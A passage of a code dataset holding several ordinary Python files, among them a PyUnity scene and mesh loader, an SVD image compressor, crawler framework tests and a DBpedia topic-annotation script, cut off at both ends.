l_shoulder, r_shoulder, nose_to_neck, hip]\n \n\n return pose_limb\n\n\n\ndef get_motion_featurs(bkps_2, bkps_1):\n body_joint = [0, 1, 2, 3, 4, 5, 6, 7, 9, 10, 11, 12, 13, 14] \n motion_features = []\n\n # for complete body pose of selected joints\n for b_j in body_joint:\n x_cor = b_j * 3\n y_cor = x_cor + 1\n \n motion_x = (bkps_2[x_cor] - bkps_1[x_cor]) \n motion_y = (bkps_2[y_cor] - bkps_1[y_cor]) \n\n # motion features\n motion_features.append(motion_x)\n motion_features.append(motion_y)\n\n return motion_features\n\n\ndef get_joint_angle(bkps):\n # first point lower, second point higher values\n joint_pair = [(0, 1), (1, 2), (1, 5), (2, 3), (3, 4), \n (5, 6), (6, 7), (1, 9), (1, 12), (9, 10),\n (10, 11), (12, 13), (13, 14)]\n \n angle_features = []\n for pair in joint_pair:\n del_x = bkps[(pair[1] * 3)] - bkps[(pair[0] * 3)] \n del_y = bkps[(pair[1] * 3) + 1] - bkps[(pair[0] * 3) + 1] \n\n if (del_x == 0):\n angle_features.append(math.pi / 2)\n else:\n 
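# Non-vertical segment: math.atan(del_y / del_x) gives the limb's slope angle\n            # in (-pi/2, pi/2); the vertical case was mapped to pi/2 above to avoid\n            # dividing by zero.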
angle_features.append(math.atan(del_y / del_x))\n\n return angle_features","sub_path":"hand_features_casiaA.py","file_name":"hand_features_casiaA.py","file_ext":"py","file_size_in_byte":6526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"46293387","text":"\"\"\"\r\nUtility functions related to loading\r\nand saving PyUnity meshes and scenes.\r\n\r\nThis will be imported as ``pyunity.Loader``.\r\n\r\n\"\"\"\r\n\r\nfrom .vector3 import Vector3\r\nfrom .quaternion import Quaternion\r\nfrom .meshes import Mesh\r\nfrom .core import *\r\nfrom .scenes import SceneManager\r\nfrom .files import Behaviour, Project, Scripts\r\nfrom .render import Camera\r\nfrom .audio import AudioSource, AudioListener, AudioClip\r\nfrom .physics import AABBoxCollider, SphereCollider, Rigidbody # , PhysicMaterial\r\nfrom uuid import uuid4\r\nimport inspect\r\nimport json\r\nimport os\r\nimport shutil\r\n\r\ndef LoadObj(filename):\r\n \"\"\"\r\n Loads a .obj file to a PyUnity mesh.\r\n\r\n Parameters\r\n ----------\r\n filename : str\r\n Name of file\r\n\r\n Returns\r\n -------\r\n Mesh\r\n A mesh of the object file\r\n\r\n \"\"\"\r\n vertices = []\r\n normals = []\r\n faces = []\r\n\r\n for line in open(filename, \"r\"):\r\n if line.startswith(\"#\"):\r\n continue\r\n values = line.split()\r\n if not values:\r\n continue\r\n if values[0] == \"v\":\r\n v = Vector3(float(values[1]), float(values[3]), float(values[2]))\r\n vertices.append(v)\r\n elif values[0] == \"f\":\r\n face = []\r\n for v in values[1:]:\r\n w = v.split(\"/\")\r\n face.append(int(w[0]) - 1)\r\n face.reverse()\r\n faces.append(face)\r\n\r\n for face in faces:\r\n a = vertices[face[2]] - vertices[face[1]]\r\n b = vertices[face[0]] - vertices[face[1]]\r\n normal = a.cross(b).normalized()\r\n normals.append(normal)\r\n\r\n return Mesh(vertices, faces, normals)\r\n\r\ndef SaveObj(mesh, name, filePath=None):\r\n if filePath:\r\n directory = os.path.dirname(os.path.abspath(filePath))\r\n else:\r\n directory = os.getcwd()\r\n os.makedirs(directory, exist_ok=True)\r\n\r\n with open(os.path.join(directory, name + \".obj\"), \"w+\") as f:\r\n for vertex in mesh.verts:\r\n f.write(\"v \" + \" \".join(map(str, round(vertex, 8))) + \"\\n\")\r\n for normal in mesh.normals:\r\n f.write(\"vn \" + \" \".join(map(str, round(normal, 8))) + \"\\n\")\r\n for face in mesh.triangles:\r\n face = \" \".join([\r\n str(face[0] + 1) + \"//\" + str(face[0] + 1),\r\n str(face[1] + 1) + \"//\" + str(face[1] + 1),\r\n str(face[2] + 1) + \"//\" + str(face[2] + 1),\r\n ])\r\n f.write(\"f \" + face + \"\\n\")\r\n\r\ndef LoadMesh(filename):\r\n \"\"\"\r\n Loads a .mesh file generated by\r\n `SaveMesh`. 
It is optimized for faster\r\n loading.\r\n\r\n Parameters\r\n ----------\r\n filename : str\r\n Name of file relative to the cwd\r\n\r\n Returns\r\n -------\r\n Mesh\r\n Generated mesh\r\n\r\n \"\"\"\r\n with open(filename, \"r\") as f:\r\n lines = list(map(lambda x: x.rstrip(), f.readlines()))\r\n if \"\" in lines:\r\n lines.remove(\"\")\r\n\r\n vertices = list(map(float, lines[0].split(\"/\")))\r\n vertices = [\r\n Vector3(vertices[i], vertices[i + 1], vertices[i + 2]) for i in range(0, len(vertices), 3)\r\n ]\r\n faces = list(map(int, lines[1].split(\"/\")))\r\n faces = [\r\n [faces[i], faces[i + 1], faces[i + 2]] for i in range(0, len(faces), 3)\r\n ]\r\n normals = list(map(float, lines[2].split(\"/\")))\r\n normals = [\r\n Vector3(normals[i], normals[i + 1], normals[i + 2]) for i in range(0, len(normals), 3)\r\n ]\r\n texcoords = list(map(float, lines[3].split(\"/\")))\r\n texcoords = [\r\n [texcoords[i], texcoords[i + 1]] for i in range(0, len(texcoords), 2)\r\n ]\r\n return Mesh(vertices, faces, normals, texcoords)\r\n\r\ndef SaveMesh(mesh, name, filePath=None):\r\n \"\"\"\r\n Saves a mesh to a .mesh file\r\n for faster loading.\r\n\r\n Parameters\r\n ----------\r\n mesh : Mesh\r\n Mesh to save\r\n name : str\r\n Name of the mesh\r\n filePath : str, optional\r\n Pass in `__file__` to save in\r\n directory of script, otherwise\r\n pass in the path of where you\r\n want to save the file. For example, if you\r\n want to save in C:\\Downloads, then give\r\n \"C:\\Downloads\\mesh.mesh\". If not\r\n specified, then the mesh is saved\r\n in the cwd.\r\n\r\n \"\"\"\r\n if filePath:\r\n directory = os.path.dirname(os.path.abspath(filePath))\r\n else:\r\n directory = os.getcwd()\r\n os.makedirs(directory, exist_ok=True)\r\n\r\n with open(os.path.join(directory, name + \".mesh\"), \"w+\") as f:\r\n i = 0\r\n for vertex in mesh.verts:\r\n i += 1\r\n f.write(str(round(vertex.x, 8)) + \"/\")\r\n f.write(str(round(vertex.y, 8)) + \"/\")\r\n f.write(str(round(vertex.z, 8)))\r\n if i != len(mesh.verts):\r\n f.write(\"/\")\r\n f.write(\"\\n\")\r\n\r\n i = 0\r\n for triangle in mesh.triangles:\r\n i += 1\r\n j = 0\r\n for item in triangle:\r\n j += 1\r\n f.write(str(item))\r\n if i != len(mesh.triangles) or j != 3:\r\n f.write(\"/\")\r\n f.write(\"\\n\")\r\n\r\n i = 0\r\n for normal in mesh.normals:\r\n i += 1\r\n f.write(str(round(normal.x, 8)) + \"/\")\r\n f.write(str(round(normal.y, 8)) + \"/\")\r\n f.write(str(round(normal.z, 8)))\r\n if i != len(mesh.normals):\r\n f.write(\"/\")\r\n f.write(\"\\n\")\r\n\r\n i = 0\r\n for texcoord in mesh.texcoords:\r\n i += 1\r\n f.write(str(texcoord[0]) + \"/\")\r\n f.write(str(texcoord[1]))\r\n if i != len(mesh.texcoords):\r\n f.write(\"/\")\r\n f.write(\"\\n\")\r\n\r\ndef GetImports(file):\r\n with open(file) as f:\r\n lines = f.read().rstrip().splitlines()\r\n imports = []\r\n for line in lines:\r\n line = line.lstrip()\r\n if line.startswith(\"import\") or (line.startswith(\"from\") and \" import \" in line):\r\n imports.append(line)\r\n return \"\\n\".join(imports) + \"\\n\\n\"\r\n\r\ndef SaveSceneToProject(scene, filePath=None, name=None):\r\n if filePath:\r\n directory = os.path.dirname(os.path.abspath(filePath))\r\n else:\r\n directory = os.getcwd()\r\n if name is None:\r\n directory = os.path.join(directory, scene.name)\r\n else:\r\n directory = os.path.join(directory, name)\r\n os.makedirs(directory, exist_ok=True)\r\n\r\n project = Project(directory, scene.name)\r\n\r\n project.import_file(os.path.join(\"Scenes\", scene.name + \".scene\"), None)\r\n 
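# SaveScene writes the .scene file registered above and then saves the project metadata\r\n    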
SaveScene(scene, directory, project)\r\n return project\r\n\r\ndef SaveAllScenes(name, filePath=None):\r\n if filePath:\r\n directory = os.path.dirname(os.path.abspath(filePath))\r\n else:\r\n directory = os.getcwd()\r\n directory = os.path.join(directory, name)\r\n os.makedirs(directory, exist_ok=True)\r\n\r\n project = Project(directory, name)\r\n\r\n for scene in SceneManager.scenesByIndex:\r\n SaveScene(scene, directory, project)\r\n project.import_file(os.path.join(\r\n \"Scenes\", scene.name + \".scene\"), None)\r\n project.write_project()\r\n return project\r\n\r\ndef SaveScene(scene, directory, project):\r\n os.makedirs(os.path.join(directory, \"Scenes\"), exist_ok=True)\r\n f = open(os.path.join(directory, \"Scenes\", scene.name + \".scene\"), \"w+\")\r\n f.write(\"Scene : \" + str(uuid4()) + \"\\n\")\r\n f.write(\" name: \" + json.dumps(scene.name) + \"\\n\")\r\n\r\n ids = {}\r\n for gameObject in scene.gameObjects:\r\n uuid = str(uuid4())\r\n\r\n ids[id(gameObject)] = uuid\r\n f.write(\"GameObject : \" + uuid + \"\\n\")\r\n f.write(\" name: \" + json.dumps(gameObject.name) + \"\\n\")\r\n f.write(\" tag: \" + str(gameObject.tag.tag) + \"\\n\")\r\n\r\n uuid = str(uuid4())\r\n\r\n ids[id(gameObject.transform)] = uuid\r\n\r\n f.write(\" transform: \" + uuid + \"\\n\")\r\n\r\n # 2nd pass (for components)\r\n for gameObject in scene.gameObjects:\r\n for component in gameObject.components:\r\n if id(component) in ids:\r\n uuid = ids[id(component)]\r\n else:\r\n uuid = str(uuid4())\r\n ids[id(component)] = uuid\r\n if issubclass(type(component), Behaviour):\r\n name = type(component).__name__ + \"(Behaviour)\"\r\n path = os.path.join(directory, \"Scripts\",\r\n type(component).__name__ + \".py\")\r\n os.makedirs(os.path.dirname(path), exist_ok=True)\r\n with open(path, \"w+\") as f2:\r\n f2.write(GetImports(inspect.getfile(type(component))))\r\n f2.write(inspect.getsource(type(component)))\r\n project.import_file(os.path.join(\"Scripts\", type(\r\n component).__name__ + \".py\"), \"Behaviour\", uuid)\r\n else:\r\n name = type(component).__name__ + \"(Component)\"\r\n f.write(name + \" : \" + uuid + \"\\n\")\r\n\r\n f.write(\" gameObject: \" + ids[id(gameObject)] + \"\\n\")\r\n for attr in component.shown:\r\n value = getattr(component, attr)\r\n if id(value) in ids:\r\n written = ids[id(value)]\r\n elif isinstance(value, Mesh):\r\n written = str(uuid4())\r\n SaveMesh(value, gameObject.name, os.path.join(\r\n directory, \"Meshes\", gameObject.name + \".mesh\"))\r\n project.import_file(os.path.join(\r\n \"Meshes\", gameObject.name + \".mesh\"), \"Mesh\", written)\r\n ids[id(value)] = written\r\n elif isinstance(value, Material):\r\n written = str(uuid4())\r\n project.save_mat(value, gameObject.name)\r\n project.import_file(os.path.join(\r\n \"Materials\", gameObject.name + \".mat\"), \"Material\", written)\r\n ids[id(value)] = written\r\n elif isinstance(value, AudioClip):\r\n written = str(uuid4())\r\n os.makedirs(os.path.join(\r\n directory, \"Sounds\"), exist_ok=True)\r\n shutil.copy(value.path, os.path.join(directory,\r\n \"Sounds\", os.path.basename(value.path)))\r\n project.import_file(os.path.join(\"Sounds\",\r\n os.path.basename(value.path)), written)\r\n ids[id(value)] = written\r\n else:\r\n written = str(value)\r\n f.write(\" \" + attr + \": \" + written + \"\\n\")\r\n\r\n project.write_project()\r\n\r\nclass ObjectInfo:\r\n def __init__(self, uuid, type, attrs):\r\n self.uuid = uuid\r\n self.type = type\r\n self.attrs = attrs\r\n\r\n def __getattr__(self, attr):\r\n return 
self.attrs[attr]\r\n\r\n\r\ncomponents = {\r\n \"Transform\": Transform,\r\n \"Camera\": Camera,\r\n \"Light\": Light,\r\n \"MeshRenderer\": MeshRenderer,\r\n \"AABBoxCollider\": AABBoxCollider,\r\n \"SphereCollider\": SphereCollider,\r\n \"Rigidbody\": Rigidbody,\r\n \"AudioSource\": AudioSource,\r\n \"AudioListener\": AudioListener\r\n}\r\n\"\"\"List of all components by name\"\"\"\r\n\r\ndef parse_string(string):\r\n if string.startswith(\"Vector3(\"):\r\n return True, Vector3(*list(map(float, string[8:-1].split(\", \"))))\r\n if string.startswith(\"Quaternion(\"):\r\n return True, Quaternion(*list(map(float, string[11:-1].split(\", \"))))\r\n if string in [\"True\", \"False\"]:\r\n return True, string == \"True\"\r\n if string == \"None\":\r\n return True, None\r\n if string.isdigit():\r\n return True, int(string)\r\n try:\r\n return True, float(string)\r\n except (ValueError, OverflowError):\r\n pass\r\n try:\r\n return True, json.loads(string)\r\n except json.decoder.JSONDecodeError:\r\n pass\r\n if string.startswith(\"(\") and string.endswith(\")\"):\r\n check, items = zip(*list(map(parse_string, string.split(\", \"))))\r\n if all(check):\r\n return True, tuple(items)\r\n if string.startswith(\"[\") and string.endswith(\"]\"):\r\n check, items = zip(*list(map(parse_string, string[1:-1].split(\", \"))))\r\n if all(check):\r\n return True, list(items)\r\n return False, None\r\n\r\ndef LoadProject(filePath):\r\n project = Project.from_folder(filePath)\r\n\r\n scenes = [value[1]\r\n for value in project.files.values() if value[0].type == \"Scene\"]\r\n for path in scenes:\r\n with open(os.path.join(project.path, path), \"r\") as f:\r\n lines = f.read().rstrip().splitlines()\r\n\r\n data = []\r\n for line in lines:\r\n if not line.startswith(\" \"):\r\n data.append([line])\r\n else:\r\n data[-1].append(line)\r\n\r\n infos = []\r\n for info in data:\r\n type_, uuid = info[0].split(\" : \")\r\n attrs = {attr: value for attr, value in map(\r\n lambda x: x[4:].split(\": \"), info[1:])}\r\n infos.append(ObjectInfo(uuid, type_, attrs))\r\n\r\n gameObjectInfo = list(filter(lambda x: x.type == \"GameObject\", infos))\r\n componentInfo = list(filter(lambda x: \"(Component)\" in x.type, infos))\r\n behaviourInfo = list(filter(lambda x: \"(Behaviour)\" in x.type, infos))\r\n\r\n scene_info = infos.pop(0)\r\n scene = SceneManager.AddBareScene(json.loads(scene_info.name))\r\n\r\n ids = {}\r\n\r\n gameObjects = []\r\n for info in gameObjectInfo:\r\n gameObject = GameObject.BareObject(json.loads(info.name))\r\n gameObjects.append(gameObject)\r\n gameObject.tag = Tag(int(info.tag))\r\n ids[info.uuid] = gameObject\r\n\r\n for info in componentInfo:\r\n gameObject = ids[info.gameObject]\r\n del info.attrs[\"gameObject\"]\r\n component = components[info.type[:-11]]\r\n component = gameObject.AddComponent(component)\r\n ids[info.uuid] = component\r\n for name, value in reversed(info.attrs.items()):\r\n check, obj = parse_string(value)\r\n if check:\r\n setattr(component, name, obj)\r\n elif value in ids:\r\n setattr(component, name, ids[value])\r\n elif value in project.files:\r\n file = project.files[value][0]\r\n if file.type == \"Material\":\r\n obj = project.load_mat(file)\r\n elif file.type == \"Mesh\":\r\n obj = LoadMesh(os.path.join(project.path, file.path))\r\n elif file.type == \"Ogg\":\r\n obj = AudioClip(os.path.join(project.path, file.path))\r\n setattr(component, name, obj)\r\n\r\n script = Scripts.LoadScripts(os.path.join(filePath, \"Scripts\"))\r\n for info in behaviourInfo:\r\n gameObject = 
ids[info.gameObject]\r\n del info.attrs[\"gameObject\"]\r\n behaviour = gameObject.AddComponent(\r\n getattr(script, info.type[:-11]))\r\n for name, value in reversed(info.attrs.items()):\r\n check, obj = parse_string(value)\r\n if check:\r\n setattr(behaviour, name, obj)\r\n elif value in ids:\r\n setattr(behaviour, name, ids[value])\r\n elif value in project.files:\r\n file = project.files[value][0]\r\n if file.type == \"Material\":\r\n obj = project.load_mat(file)\r\n elif file.type == \"Mesh\":\r\n obj = LoadMesh(os.path.join(project.path, file.path))\r\n elif file.type == \"Ogg\":\r\n obj = AudioClip(os.path.join(project.path, file.path))\r\n setattr(behaviour, name, obj)\r\n\r\n for gameObject in gameObjects:\r\n scene.Add(gameObject)\r\n\r\n scene.mainCamera = scene.FindGameObjectsByName(\r\n \"Main Camera\")[0].GetComponent(Camera)\r\n\r\n return project\r\n\r\nclass Primitives:\r\n \"\"\"\r\n Primitive preloaded meshes.\r\n Do not instantiate this class.\r\n\r\n \"\"\"\r\n\r\n __path = os.path.dirname(os.path.abspath(__file__))\r\n cube = LoadMesh(os.path.join(__path, \"primitives/cube.mesh\"))\r\n quad = LoadMesh(os.path.join(__path, \"primitives/quad.mesh\"))\r\n double_quad = LoadMesh(os.path.join(__path, \"primitives/double_quad.mesh\"))\r\n sphere = LoadMesh(os.path.join(__path, \"primitives/sphere.mesh\"))\r\n capsule = LoadMesh(os.path.join(__path, \"primitives/capsule.mesh\"))\r\n cylinder = LoadMesh(os.path.join(__path, \"primitives/cylinder.mesh\"))\r\n","sub_path":"pyunity/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":16692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"291024056","text":"# Python 3.5.2 with anaconda-numpy\n\nimport numpy as np\nimport os\nimport shutil\n\ntry: shutil.rmtree('compressed_matrices/')\nexcept OSError: print('making new folder')\nos.mkdir('compressed_matrices')\n\nf = open('control.txt', 'r')\nimagename = next(f).split()[-1].strip()\nterms = tuple(next(f).split(':')[-1].strip().split(', '))\n\n\ndef diagonal_insertion(vector, dim):\n cols, rows = dim\n\n result = []\n blank_vector = [0 for _ in range(cols)]\n for i in range(rows):\n sigma_vector = blank_vector[:]\n if i < cols:\n sigma_vector[i] = vector[i]\n result.append(sigma_vector)\n return np.matrix(result, dtype='int')\n\ndef compress(filename, terms=10):\n\n file = open('uncompressed/{}'.format(filename), 'r').read()[:-2] # strips trailing ';\\n'\n\n A = np.matrix(file)\n\n n, M = A.shape\n globals()['dimensions'] = n, M\n\n u, sigma_vals, v = np.linalg.svd(A)\n\n assert n >= terms\n sigma_vals[terms:] = [0 for _ in range(n-terms)]\n\n sigma = diagonal_insertion(sigma_vals, (M, n))\n\n return u @ sigma @ v\n\ndef compress_all_layers(terms):\n\n folder = 'compressed_matrices/' + str(terms) + '/'\n\n try:\n os.mkdir(folder)\n except FileExistsError:\n pass\n\n for filename in ('red.txt', 'blue.txt', 'green.txt'):\n result = compress(filename, terms=terms)\n\n outfile = open(folder+filename, 'w')\n for line in result.tolist():\n for v in line:\n v = min(255, max(0, int(v+.5))) # whole number 0 to 255\n outfile.write(str(v).ljust(4))\n outfile.write('\\n')\n\n\n n,M = globals()['dimensions']\n open(folder+'info', 'w').write('''picture is {}x{} pixels\n\n {} of {} possible terms used\n {} bytes needed for this representation.\n compared to {} bytes needed for the non-compressed image\n a total savings of {:.2f}%\n '''.format(M, n, terms, min(M, n), terms + terms * (n + M), n*M,\n 100*(1- (terms + terms * 
(n + M))/(n*M)))\n )\n\nfor t in terms:\n print('compressing with {} terms'.format(t))\n compress_all_layers(int(t))\n\nprint('all images compressed to matrices, run to begin png generation')","sub_path":"SVD_decomp 2/compressor.py","file_name":"compressor.py","file_ext":"py","file_size_in_byte":2191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"340109810","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef f(t):\n return np.exp(-t) * np.cos(2*np.pi*t)\n\n\nplt.plot([1,2,3,4])\nplt.ylabel('some numbers')\nplt.show()\n\n# evenly sampled time at 200ms intervals\nt = np.arange(0., 5., 0.2)\n\n# red dashes, blue squares and green triangles\nplt.plot(t, t, 'r--', t, t**2, 'bs', t, t**3, 'g^')\nplt.show()\n\nt1 = np.arange(0.0, 5.0, 0.1)\nt2 = np.arange(0.0, 5.0, 0.02)\n\nplt.figure()\nplt.subplot(211)\nplt.plot(t1, f(t1), 'bo', t2, f(t2), 'k')\n\nplt.subplot(212)\nplt.plot(t2, np.cos(2*np.pi*t2), 'r--')\nplt.show()","sub_path":"matplotlibtest.py","file_name":"matplotlibtest.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"530054285","text":"# coding=utf-8\n\nfrom os.path import join, exists\nimport asyncio\nimport os\nimport signal\nimport time\nfrom threading import Thread\n\nfrom xpaw.spider import Spider\nfrom xpaw.http import HttpRequest\nfrom xpaw.queue import PriorityQueue\nfrom xpaw.run import run_spider\nfrom xpaw.item import Item\nfrom xpaw.errors import IgnoreItem\n\n\nclass StartRequestSpider(Spider):\n def start_requests(self):\n yield HttpRequest('http://python.org/')\n\n async def parse(self, response):\n pass\n\n\nclass BadQueue(PriorityQueue):\n async def pop(self):\n await super().pop()\n raise RuntimeError('not an error actually')\n\n\nclass BadQueue2(PriorityQueue):\n async def pop(self):\n raise RuntimeError('not an error actually')\n\n\ndef test_coro_terminated():\n run_spider(StartRequestSpider, downloader_clients=2, queue=BadQueue, max_retry_times=0)\n\n\ndef test_coro_terminated2():\n run_spider(StartRequestSpider, downloader_clients=2, queue=BadQueue2, max_retry_times=0)\n\n\nclass ToKillSpider(Spider):\n def start_requests(self):\n yield HttpRequest('http://python.org/')\n\n async def parse(self, response):\n while True:\n await asyncio.sleep(5)\n\n\nclass ExceptionThread(Thread):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.bucket = []\n\n def run(self):\n try:\n super().run()\n except Exception as e:\n self.bucket.append(e)\n raise\n\n\ndef test_kill_spider(tmpdir):\n pid_file = join(str(tmpdir), 'pid')\n log_file = join(str(tmpdir), 'log')\n t = ExceptionThread(target=kill_spider, args=(pid_file,))\n t.start()\n run_spider(ToKillSpider, pid_file=pid_file, log_file=log_file)\n t.join()\n assert len(t.bucket) == 0, 'Exception in thread'\n\n\ndef _check_pid(pid):\n try:\n os.kill(pid, 0)\n except OSError:\n return False\n else:\n return True\n\n\ndef kill_spider(pid_file):\n t = 10\n while t > 0 and not exists(pid_file):\n t -= 1\n time.sleep(1)\n assert t > 0\n with open(pid_file, 'rb') as f:\n pid = int(f.read().decode())\n assert _check_pid(pid) is True\n os.kill(pid, signal.SIGTERM)\n t = 10\n while t > 0 and exists(pid_file):\n t -= 1\n time.sleep(1)\n assert t > 0\n\n\nclass FooError(Exception):\n pass\n\n\nclass HandlerDownloaderMiddleware:\n def handle_request(self, request):\n if request.url.endswith('error'):\n raise FooError\n\n\nclass 
HandlerSpiderMiddleware:\n def handle_spider_input(self, response):\n if response.request.url.endswith('not-found'):\n raise FooError\n\n def handle_spider_error(self, response, error):\n if isinstance(error, FooError):\n return ()\n\n\nclass HandlerSpider(Spider):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.data = self.config.get('data')\n self.server_address = self.config.get('server_address')\n\n def start_requests(self):\n yield HttpRequest(\"http://unknown/\", errback=self.error_back)\n yield HttpRequest(\"http://unknown/\", dont_filter=True, errback=self.async_error_back)\n yield HttpRequest(\"http://{}/error\".format(self.server_address), errback=self.handle_request_error)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.generator_parse)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.func_prase)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.async_parse)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.return_list_parse)\n yield HttpRequest(\"http://{}/\".format(self.server_address), dont_filter=True, callback=self.return_none_parse)\n\n def parse(self, response):\n self.data.add('parse')\n\n def error_back(self, request, err):\n self.data.add('error_back')\n raise RuntimeError('not an error actually')\n\n async def async_error_back(self, request, err):\n self.data.add('async_error_back')\n raise RuntimeError('not an error actually')\n\n def handle_request_error(self, request, error):\n assert isinstance(error, FooError)\n self.data.add('handle_request_error')\n\n def generator_parse(self, response):\n self.data.add('generator_parse')\n if response.status / 100 != 2:\n raise RuntimeError('not an error actually')\n # it will never come here\n yield None\n\n def func_prase(self, response):\n self.data.add('func_parse')\n raise RuntimeError('not an error actually')\n\n async def async_parse(self, response):\n self.data.add('async_parse')\n raise RuntimeError('not an error actually')\n\n def return_list_parse(self, response):\n self.data.add('return_list_parse')\n return []\n\n def return_none_parse(self, response):\n self.data.add('return_none_parse')\n\n\ndef test_spider_handlers():\n data = set()\n run_spider(HandlerSpider, log_level='DEBUG', extensions=[HandlerDownloaderMiddleware, HandlerSpiderMiddleware],\n data=data, server_address='python.org')\n assert 'parse' in data\n assert 'error_back' in data\n assert 'async_error_back' in data\n assert 'handle_request_error' in data\n assert 'generator_parse' in data\n assert 'func_parse' in data\n assert 'async_parse' in data\n assert 'return_list_parse' in data\n assert 'return_none_parse' in data\n\n\nclass DummyItem(Item):\n pass\n\n\nclass DroppedItem(Item):\n pass\n\n\nclass ErrorItem(Item):\n pass\n\n\nclass FooItemPipeLine:\n def __init__(self, data):\n self.data = data\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(crawler.config.get('data'))\n\n def handle_item(self, item):\n if isinstance(item, DroppedItem):\n raise IgnoreItem\n elif isinstance(item, ErrorItem):\n raise RuntimeError('not an error actually')\n self.data['item'] = item\n\n\nclass ItemSpider(Spider):\n def start_requests(self):\n yield HttpRequest('http://python.org/')\n\n def parse(self, response):\n yield DroppedItem()\n yield 
ErrorItem()\n yield DummyItem()\n\n\ndef test_handle_item():\n data = {}\n run_spider(ItemSpider, log_level='DEBUG', data=data, extensions=[FooItemPipeLine])\n assert isinstance(data.get('item'), DummyItem)\n\n\nclass ToDumpSpider(Spider):\n def start_requests(self):\n yield HttpRequest('http://python.org/', callback=self.parse_response, meta={'key': 'value'})\n\n async def parse_response(self, response):\n while True:\n await asyncio.sleep(10)\n\n\nclass ToLoadSpider(Spider):\n def start_requests(self):\n pass\n\n async def parse_response(self, response):\n data = self.config.get('data')\n data['url'] = response.request.url\n data['meta'] = response.meta\n","sub_path":"tests/test_crawler.py","file_name":"test_crawler.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"467779298","text":"# -- Load library --\nimport logging\n\n\n# -- custom logger --\ndef setup_custom_logger(name):\n formatter = logging.Formatter(fmt='%(asctime)s - %(levelname)s - %(module)s - %(message)s')\n\n # handler = logging.StreamHandler()\n handler = logging.FileHandler('logs/application.log')\n handler.setFormatter(formatter)\n\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(handler)\n\n return logger\n","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"571679330","text":"#!/usr/bin/env python3\n\"\"\"count the vowels in a word\"\"\"\nimport sys\nfrom collections import Counter\n\nargs = sys.argv\n\nif len(args) < 2:\n print(\"Usage:\", args[0], \"STRING\")\n sys.exit(1)\n\nc = Counter(args[1].lower())\n\nnumv = c[\"a\"] + c[\"e\"] + c[\"i\"] + c[\"o\"] + c[\"u\"]\n\nif numv == 1:\n sp = \"vowel\"\n ir = \"is\"\nelse:\n sp = \"vowels\"\n ir = \"are\"\n\nprint(\"There\", ir, numv, sp, \"in\", '\"'+args[1]+'.\"')\n\n","sub_path":"problems/hello-py/vowel_counter.py","file_name":"vowel_counter.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"175359247","text":"import spotlight\nfrom spotlight import SpotlightException\nimport pandas\nimport urllib\nimport time\n\ndef start():\n\tcoursesCSVname=r'CSV\\Courses.csv'\n\ttopicsCSVname=r\"CSV\\Topics.csv\"\n\t\n\tcourses_df=pandas.read_csv(coursesCSVname, encoding='ISO-8859-1')\n\tcourses=courses_df.to_dict('records')\n\t\n\t\n\tfinal_course_topics=list()\n\tcou_list = list(range(0,len(courses)))\n\tprint(cou_list)\n\tadded_index=40\n\tstart=0\n\twhile(start=len(cou_list):\n\t\t\tend=len(cou_list)\n\t\tprint(start, end) \n\t\t############################################\t\n\t\tfor val_llop in range(start,end):\n\t\t\tloop=cou_list[val_llop]\n\t\t\tprint(loop)\n\t\t\ttry:\n\t\t\t\tcourse=courses[loop]\n\t\t\t\t##courses_updated.add(course['Course Subject']+\":\"+str(course['Course Number']))\n\t\t\t\ttopic_included=list()\n\t\t\t\tdata=\"\"\n\t\t\t\tif str(course[\"Course Description\"]).lower()==\"nan\":\n\t\t\t\t\tdata=course[\"Course Name\"]\n\t\t\t\telse:\n\t\t\t\t\tdata=course[\"Course Name\"]+\" \"+str(course[\"Course Description\"])\n\t\t\t\tlinks=spotlight.annotate('https://api.dbpedia-spotlight.org/en/annotate', data, confidence=0.5, support=20)\n\t\t\t\t##computer_topics=list()\t\n\t\t\t\tfor link in links:\n\t\t\t\t\tif link['surfaceForm'].lower() not in 
topic_included:\n\t\t\t\t\t\ttopic=dict()\n\t\t\t\t\t\ttopic['Course Subject']=course['Course Subject']\n\t\t\t\t\t\ttopic['Course Number']=course['Course Number']\n\t\t\t\t\t\ttopic['Course Name']=course[\"Course Name\"]\n\t\t\t\t\t\ttopic_included.append(link['surfaceForm'].lower())\n\t\t\t\t\t\ttopic['Topic']=link['surfaceForm']\n\t\t\t\t\t\ttopic['URI']=link['URI']\n\t\t\t\t\t\tcourse_topics.append(topic)\n\t\t\t\t\n\t\t\t\t\n\t\t\t\t##course_topics.extend(computer_topics)\n\t\t\t## repeat only if 403 is thrown\n\t\t\texcept SpotlightException:\n\t\t\t\tcontinue\n\t\t\texcept:\n\t\t\t\tindexes.append(loop)\n\t\t\n\t\t\t\n\t\tprint(\"indexes\",indexes)\n\t\tprint(start,end)\n\t\t##to save data\n\t\tremove_lst=set()\n\t\tfor loop in range(0,len(cou_list)):\n\t\t\tif loop>=start and loop15000:\n 